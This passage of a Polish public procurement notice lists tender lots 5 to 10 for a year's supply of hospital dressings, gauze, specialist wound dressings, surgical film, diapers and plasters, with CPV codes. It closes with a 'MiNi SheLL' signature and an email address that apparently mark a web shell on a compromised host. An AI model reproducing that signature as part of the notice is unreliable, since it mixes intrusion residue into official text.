2)	Opatrunek oczny niejałowy 56 x 70 mm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa środków opatrunkowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	elastyczna siatka opatrunkowa Nr 2 x 1 m
2)	elastyczna siatka opatrunkowa Nr 4 x 1 m
3)	elastyczna siatka opatrunkowa  Nr 4 x 10 m
4)	elastyczna siatka opatrunkowa Nr 6 x 1 m
5)	elastyczna siatka opatrunkowa Nr 8 x 1 m
6)	elastyczna siatka opatrunkowa Nr 10 x 1 m
7)	elastyczna siatka opatrunkowa Nr 14 x 1 m
8)	kompresy gazowe wyjałowione 17 - nitkowe 5 cm x 5 cm x 3 szt
9)	kompresy gazowe wyjałowione 17 - nitkowe 7,5cm x 7,5 cm x 3 szt
10)	kompresy gazowe wyjałowione 17 - nitkowe 10 cm x 10 cm x 3 szt
11)	kompresy gazowe niewyjałowione 13 - nitkowe 12 - warstwowe 9 cm x 9 cm x 500 szt
12)	kompresy gazowe niewyjałowione 17 - nitkowe 8 warstwowe 10 cm x 20 cm x 100 szt
13)	opaska gipsowa  4m x 15 cm - 6 min, 5-6 minut
14)	patyczki kosmetyczne (higieniczne)
15)	tupfery gazowe fasola 15cm x 15cm x 500 szt
16)	tupfery gazowe kule 20cm x 20 cm x 500 szt
17)	setony 2 x 1 cm 4 w 17 nit x 200 szt
18)	setony 2 x 2cm 4 w 17 nit x 120 szt
19)	serwety gazowe operacyjne jałowe z nitką i 
tasiemką 45 cm x 45cm x 5 szt - 8 warstw.
20)	kompres wysokochłonny wyjałowiony 10 cm x 15cm x 20 szt
21)	Opaska bawełniana tkana 4mx15cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa opatrunków specjalistycznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Jałowy, hydroaktywny żel z alginianami, o działaniu autolitycznym do usuwania  tkanki martwiczej, opakowanie 15 g
2)	Jałowy, hydroaktywny żel z alginianami, o działaniu autolitycznym do usuwania  tkanki martwiczej, opakowanie  a 25g
3)	Jałowy opatrunek z aktywowanym węglem i srebrem, o działaniu bakteriobójczym i eliminującym nieprzyjemny zapach, rozmiar 10,5 cm x 10,5 cm (+/- 1-2%)
4)	Jałowy opatrunek z aktywowanym węglem i srebrem, o działaniu bakteriobójczym i eliminującym nieprzjemny zapach, rozmiar 19cmx10,5 cm (+/- 1-2%)
5)	Jałowy,  nieprzywierający opatrunek , zawierający 10% jodynę powidonową, o rozmiarach 5,0 cm x 5,0 cm (+/- 1-2%)
6)	Jałowy nieprzywierający opatrunek, zawierający 10% jodynę powidonową, o rozmiarach 9,5 cm x 9,5 cm (+/- 1-2%)
7)	Jałowy, hydropolimerowy, wodoodporny opatrunek  chłonny, z brzeżną częścią samoprzylepną o rozmiarach 11 cm x 11 cm (+/- 1-2%)
8)	Jałowy, hydropolimerowy, wodoodporny opatrunek chłonny, z brzeżną częścią samoprzylepną, o rozmiarach 15 cm x 15 cm (+/- 1-2%)
9)	Jałowy hydropolimerowy, wodoodporny opatrunek chłonny, z brzeżną częścią samoprzylepną, na kość krzyżową o rozmiarach 18 cm x 18 cm (+/- 1-2%)
10)	Jałowy hydropolimerowy, wodoodporny opatrunek chłonny, z brzeżną częścią samoprzylepną, na kość krzyżową o rozmiarach 18 cm x 18 cm (+/- 1-2%) -sacrum
11)	Jałowy, nieprzywierający opatrunek z siateczki wiskozowej, pokryty substancją oleisto-wodną, o rozmiarze 7,6 cm x 7,6 cm (+/-1-2%)
12)	Jałowy, nieprzywierający opatrunek z siateczki wiskozowej, pokryty substancją oleisto-wodną, o rozmiarze 12,7 cm x 22,9 cm (+/-1-2%)
13)	Jałowy, nieprzywierający opatrunek z siateczki wiskozowej, pokryty substancją oleisto-wodną, o rozmiarze 7,6 cm x 20,3 cm (+/-1-2%)
14)	Jałowy, poliuretanowy, przeźroczysty, półprzepuszczalny opatrunek samoprzylepny, o rozmiarze 12,7 cm x 17,8 cm (+/-1-2%)
15)	Jałowy, poliuretanowy, przeźroczysty, półprzepuszczalny opatrunek samoprzylepny, o rozmiarze 10,2 cmx12,7cm (+/-1-2%)
16)	Jałowy opatrunek kolagenowo-alginianowy, dostosowujący się do kształtu rany, wolny od włókien, o rozmiarze 10,2 cm x 11,1 cm (+/-1-2%)
17)	Jałowy opatrunek kolagenowo-alginianowy  taśma 1x1x40cm
18)	Jałowy opatrunek zawierający kolagen i regenerowaną utlenowaną celulozę, modulujący środowisko rany trudnogojącej się, o właściwościach hemostatycznych, ulegający biodegradacji, o rozmiarze 28 cm2  (+/-1-2%).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa folii chirurgicznej samoprzylepnej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Samoprzylepna folia chirurgiczna 29x25cm
2)	Samoprzylepna folia chirurgiczna 35x35cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa pieluchomajtek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Piel-majtki dla dzieci: Junior 
11-25 kg
2)	Piel-majtki dla dzieci: 4-9 kg
3)	Piel-majtki dla dzieci 2-5 kg
4)	Pieluchomajtki - rozmiar S (Small) oddychające.
5)	Pieluchomajtki - rozmiar M  (Medium) -obwód w pasie 75-130cm ,chłonność minimalna 1.600 g  pieluchy oddychające na całej pow.
6)	Pieluchomajtki - rozmiar L (Large) -obwód w pasie 110-150cm, chłonność minimalna 2.200g  pieluchy oddychające  na całej pow..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.15-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa środków opatrunkowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przylepiec  włókninowy na kleju akrylowym, precyzyjnie dzielący się wzdłuż i w poprzek bez użycia nożyczek, 1,25 cm x 9,1 cm-9,2 cm
2)	Przylepiec  włókninnowy na kleju akrylowym, precyzyjnie dzielący się wzdłuż i w poprzek bez użycia nożyczek, 2,5 cm x 9,1 cm-9.2cm
3)	Przylepiec  włókninnowy na kleju akrylowym, precyzyjnie dzielący się wzdłuż i w poprzek bez użycia nożyczek, 5,0 cm x 9,1 cm- 9,2 cm
4)	Przylepiec z folii poliuretanowej, precyzyjnie dzielący się wzdłuż i w poprzek bez użycia nożyczek 2,5 cm x 5m
5)	Przylepiec  włókninowy na kleju akrylowym, z perforacją co 5cm umożliwiającą dzielenie w poprzek bez użycia nożyczek, 2,5cm x  9,1 cm-9,2cm
6)	Przylepiec  włókninowy na kleju akrylowym, z perforacją co 5cm umożliwiającą dzielenie w poprzek bez użycia nożyczek, 5,0 cm x  9,1 cm- 9.2 cm
7)	Przylepiec  włókninowy na kleju akrylowym, z perforacją co 5cm umożliwiającą dzielenie w poprzek bez użycia nożyczek, 7,6 cm x  9,1 cm-9,2cm
8)	Przylepiec  włókninowy na kleju akrylowym, z perforacją co 5cm umożliwiającą dzielenie w poprzek bez użycia nożyczek, 10,1 cm x  9,1 cm-9,2 cm
9)	Przylepiec  włókninowy na kleju akrylowym, z perforacją co 5cm umożliwiającą dzielenie w poprzek bez użycia nożyczek, 15,2 cm x  9,1 cm-9,2cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8, 33.14.11.16-6, 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa środków opatrunkowych..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przylepiec na kleju akrylowym z elastycznej pianki, rozciągliwy wzdłuż i w poprzek 2,5 cm x 5m
2)	Przylepiec na kleju akrylowym z elastycznej pianki, rozciągliwy wzdłuż i w poprzek 5,0 cm x 5m
3)	Przylepiec na kleju akrylowym z elastycznej pianki, rozciągliwy wzdłuż i w poprzek 10,0 cm x 5m
4)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 5,0 cm x 7,0 cm
5)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 6,0 cm x 10,0 cm
6)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 9,0 cm x 10,0 cm
7)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 9,0 cm x 15,0 cm
8)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 9,0 cm x 20,0 cm
9)	Sterylny, przeźroczysty opatrunek poliuretanowy do wkłuć obwodowych, z ramką i metką, na kleju akrylowym, ze wzmocnieniem włókninowym i dodatkowymi paskami mocującymi, odporny na działanie środków dezynfekcyjnych 7,0 cm x 8,5 cm
10)	Opatrunek poliuretanowy z centralną warstwą chłonną nieprzywierającą do rany, na kleju akrylowym, 9,0 cm x 25,0 cm
11)	Sterylny, przeźroczysty opatrunek poliuretanowy do wkłuć centralnych, z ramką i metką, na kleju akrylowym, ze wzmocnieniem włókninowym i dodatkowymi paskami mocującymi, odporny na działanie środków dezynfekcyjnych 10,5 cm x 8,5 cm
12)	Sterylny, przeźroczysty opatrunek poliuretanowy z ramką, na kleju akrylowym, równomiernie rozłożonym na całej powierzchni opatrunku, odporny na działanie środków dezynfekcyjnych, 4,4 cm x 4,4 cm
13)	Sterylny, przeźroczysty opatrunek poliuretanowy do wkłuć centralnych, z ramką, na kleju akrylowym, równomiernie rozłożonym na całej powierzchni opatrunku, odporny na działanie środków dezynfekcyjnych, 10,0 cm x 12,0 cm
14)	Sterylny, przeźroczysty opatrunek poliuretanowy do wkłuć centralnych, z ramką, na kleju akrylowym, równomiernie rozłożonym na całej powierzchni opatrunku, odporny na działanie środków dezynfekcyjnych, kształt owalny, 10,0 cm x 11,5 cm
15)	Sterylny, przeżroczysty opatrunek poliuretanowy do wkłuć centralnych, z ramką, na kleju akrylowym, równomiernie rozłożonym na całej powierzchni opatrunku, odporny na działanie środków dezynfekcyjnych,  10,0 cm x 25,0 cm
16)	Sterylny, przeżroczysty opatrunek poliuretanowy do wkłuć centralnych, z ramką, na kleju akrylowym, równomiernie rozłożonym na całej powierzchni opatrunku, odporny na działanie środków dezynfekcyjnych,  15,0 cm x 20,0 cm
17)	Paski zastępujące nici chirurgiczne, wzmocnione włóknami jedwabnymi, sterylne, 6mm x 75mm (koperta a 3 paski)
18)	Paski zastępujące nici chirurgiczne, elastyczne, sterylne,  6mm x 100mm(koperta a 10  pasków)
19)	Paski zastępujące nici chirurgiczne, elastyczne, sterylne,  12mm x 100mm (koperta a 6  pasków)
20)	Sterylny, przeźroczysty opatrunek poliuretanowy do wkłuć obwodowych, z ramką , na kleju akrylowym, ze wzmocnieniem włókninowym i dodatkowymi paskami mocującymi, odporny na działanie środków dezynfekcyjnych,  5,0 cm x 5,7 cm.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.12-8, 33.14.11.11-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com